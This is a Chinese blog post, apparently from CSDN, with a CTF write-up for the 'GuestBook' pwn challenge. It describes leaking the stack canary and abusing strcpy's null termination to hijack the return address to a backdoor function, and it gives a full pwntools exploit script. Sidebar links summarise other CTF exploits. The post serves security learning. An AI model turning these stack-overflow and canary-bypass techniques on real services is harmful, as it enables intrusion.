GuestBooK--pwn

已于 2023-11-22 20:34:44 修改
阅读量68 收藏 1
点赞数
分类专栏: pwn 文章标签: 学习 python linux
于 2023-11-02 19:04:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fuiifiuiii/article/details/134189183
版权

GuestBooK–pwn

  • 先利用read与puts,填充掉canary的最后一位,把canary打印出来,用这种不一样的字符方便接收和检验

    payload = b"A"*(0x20-0x8-1)+b"B"+b'C'

在这里插入图片描述

然后需要利用strcpy输入两次,第一次把最后一位不对的canary以及后门函数地址输入进去,第二次把canary最后一位改为‘00’

当时没做出来,忘记了这种基础的泄露canary的方式了 》我真该死《

有一些要注意的地方:

  • 填充不一样的字母来方便接收的停顿
  • strcpy遇到00会截断,所以不能有00,第一次注意注入的时候不要被截断掉
  • 第二次利用strcpy会在最后加\x00的特性,来恢复canary的正确值
  • 第二次不是在栈顶输入的,要加0x20
  • 循环中的这个输入没有限制长度(当时做的时候脑抽没想到)
  • 注意栈对齐

exp:

from pwn import*
context(log_level='debug',arch='amd64',os='linux')
p=process('./GuestBook')
#p=remote('',)
sl = lambda s :p.sendline(s)
sd = lambda s :p.send(s)
rc = lambda s :p.recv(s)
ru = lambda s :p.recvuntil(s)
rl = lambda   :p.recvline()

def debug():
    gdb.attach(p)
    pause(1)
backdoor_addr = 0x04012C0
payload = b"A"*(0x20-0x8-1)+b"B"+b'C'
#gdb.attach(p)
sd(payload)
ru('B')

canary = u64(rc(8))
print(hex(canary))
sl(b'2')

payload = b'A'*(0xa0-0x8)+p64(canary)*2+p64(backdoor_addr)
sl(payload)

payload = b"A"*(0xa0-0x20-8)
debug()
sl(payload)

p.interactive()
XYYR-c
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
BUUCTF-PWN刷题记录-3
weixin_44145820的博客
03-31 832
目录hitcontraining_heapcreator hitcontraining_heapcreator 考虑修改GOT表 在edit函数中可以溢出一个byte 这题需要利用堆重叠的方法,因为free之后会置空,只能利用堆重叠进行重复分配 利用思路如下: 先申请三个heap,其中heap[0]的内容大小为8的奇数倍 使用edit溢出修改heap[1]的chunk的size,把heap[...
2021-08-30 BUUCTF刷题记录PWN
m0_56897090的博客
08-30 482
2021-08-30 BUUCTF刷题记录 刷题数量:13 题目分类:栈溢出、堆、pwn基础 文章目录2021-08-30 BUUCTF刷题记录[Black Watch 入群题]PWN0x00 题目描述0x01 分析思路0x02 EXPez_pz_hackover_20160x00 题目描述0x01 题目分析0x02 思路0x03 EXPjarvisoj_tell_me_something0x00 题目描述0x01 题目分析0x02 EXPJarvisoj_level30x00 题目描述0x01 题目思路0
BUUCTF-pwn(4)
njh18790816639的博客
11-16 1238
pwn2_sctf_2016 该题目还是比较简单的! 并且存在int 80中断,但可惜没有/bin/sh字符串!所以还是ret2libc! from pwn import * from LibcSearcher import * context(log_level='debug',os='linux',arch='i386') r = remote('node4.buuoj.cn',28630) #r = process('./pwn2_sctf_2016') elf = ELF('./pwn2_sc
XYCTF --PWN
A13837377363的博客
04-02 931
这是学pwn以来遇到的第一个题目较多的线上比赛,记录一下pwn各题wp。
Jarvis OJ-PWN-Tell Me Something wp
分不清东西南北的Laffey
11-02 386
开启了NX保护 说明栈中数据没有执行权限 拖到IDA里看一下 通过观察IDA左侧的函数栏可以看到一个good_game函数 点进去观察 我们看到了flag.txt 可以想到flag应该就在这个txt文档里 于是我们就可以让溢出的返回地址为good_game函数 通过cyclic或者IDA来获取长度 from pwn import * #p=process("./guestbook") ...
2024xyctf-部分pwn题个人wp
m0_73575406的博客
04-28 209
观察ida,一大堆内容,是静态链接的程序(也可以在虚拟机中使用file命令查看),漏洞也是简单的溢出,那么需要一个rop链就行。思路:两次写buf产生溢出,且有printf打印buf内容,想到的是利用printf打印截止到\x00的特性泄露地址,此时gdb调试又发现栈上有个和libc_base很近的地址,把它打印出来就可以泄露libc了。gift函数本身没啥用,但是调用它使rdi的值为v2的地址,这就有用了,可以返回地址填入printf,v2写上%27$p,就把libc泄露出来了。
JarvisOJ-PWN-Tell_Something
杀生丸?不,其实我要的是桔梗
03-16 259
JarvisOJ-PWN-Tell_Something 首先,检查后是64位的gcc。 用IDA打开。 在Export发现这些函数: 这些函数一看就知道是自己写的函数了。 先看main 再看read。里的v4 可以看出v4内存空间为:0x88。 read 0x100>0x88,存在栈溢出漏洞。 那该怎么利用呢? 再看readmassage 可能也是...
XYCTF Pwn
Chuang__的博客
04-28 1827
题目质量很高,学习到了很多,后期因为考试没太多时间打,其中ptmalloc2_its_myheap系列三个题未解,malloc-flag未解 欢迎交流
Javris oj -pwn tell me something
hanqdi_的博客
02-04 575
pwn - tell me something 修改权限:chmod 777 guestbook 检查保护机制:checksec guestbook 64位文件,开启堆栈不可执行保护,不能往堆栈里写入shellcode解题。 用64位ida打开guestbook,找漏洞点 from pwn import * r=remote('pwn.jarvisoj.com',9876) pay...
guestbook-spring
04-29
Spring Framework留言簿 要编译并运行此示例,请首先安装maven apt-get安装maven cd进入主目录并运行 mvn spring-boot:运行 该应用程序将启动并使其在端口8080上可用。 该应用程序需要存在一个名为spring_...
Guestbook-开源
05-01
斯洛伐克人和其他人的留言簿。 使用PHP和MySQL,Guestbook易于管理。
guestbook-app
03-27
Create React App入门该项目是通过引导的。可用脚本在项目目录中,可以运行:npm start 在开发模式下运行应用程序。 打开在浏览器中查看它。 如果您进行编辑,则页面将重新加载。 您还将在控制台中看到任何棉绒错误...
Simple guestbook-开源
07-01
一个非常简单的留言簿,很容易包含在网站中。
Easy GuestBook-开源
04-24
有网站吗? 想要留言簿,以便您的访客可以在上面留下深刻的印象吗? Easy-GuestBook是您需要的脚本。 它需要php4和mysql服务器。 易于安装,易于定制,易于翻译...:D
如何学习Golang语言!
FengyangCoder的博客
06-09 397
起源与设计哲学:Go语言由Robert Griesemer、Rob Pike和Ken Thompson三位Google工程师设计,旨在解决现代编程中的一些常见问题,如编译速度、运行效率和并发编程。主要特点:Go语言的语法简单、编译速度快、运行效率高,支持静态类型和内存安全,具有垃圾回收功能,并且原生支持并发编程。
扩展学习|风险管理的文献综述汇总(持续更新向)
weixin_63253486的博客
06-10 775
本片博客主要介绍风险管理领域本人所看到的一些有意思的文章,并就风险管理领域的相关内容进行一个分享。
[ue5]建模场景学习笔记(5)——必修内容可交互的地形,交互沙(3)
qq_40128113的博客
06-09 299
5.第一想法直接clear掉,但直接clear会把想要保留的痕迹一并去除,跑起来就没有痕迹!所以不行,要做一个转载,先把痕迹保留在一个载体上,清楚原来痕迹,用sandsave表示,再把这个载体的痕迹保存回原来rt,这样之前的痕迹被清空了,只留下了保存在载体上的部分,正好符合我们想要的部分。我们现在已经能够让这片地形出现在任意地方,只要角色走在这片地形上,就能够产生痕迹,但这片区域总是需要人工指定,又无法把这片区域无限扩大(显存爆炸),因此尝试使角色无论走到哪里都能产生痕迹。否则绘制不到画板上。
Qt---pro文件的学习
最新发布
weixin_51883798的博客
06-11 424
【代码】Qt---pro文件的学习
怎样用php做留言表,用PHP制作留言板-PHP教程,PHP应用
05-29
创建一个留言板页面(例如:guestbook.php),该页面包含一个表单和一个显示留言的区域。 3. 处理留言提交。 在guestbook.php页面中,通过PHP代码处理提交的留言。获取表单中的用户名和内容,并将其插入到留言表中...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值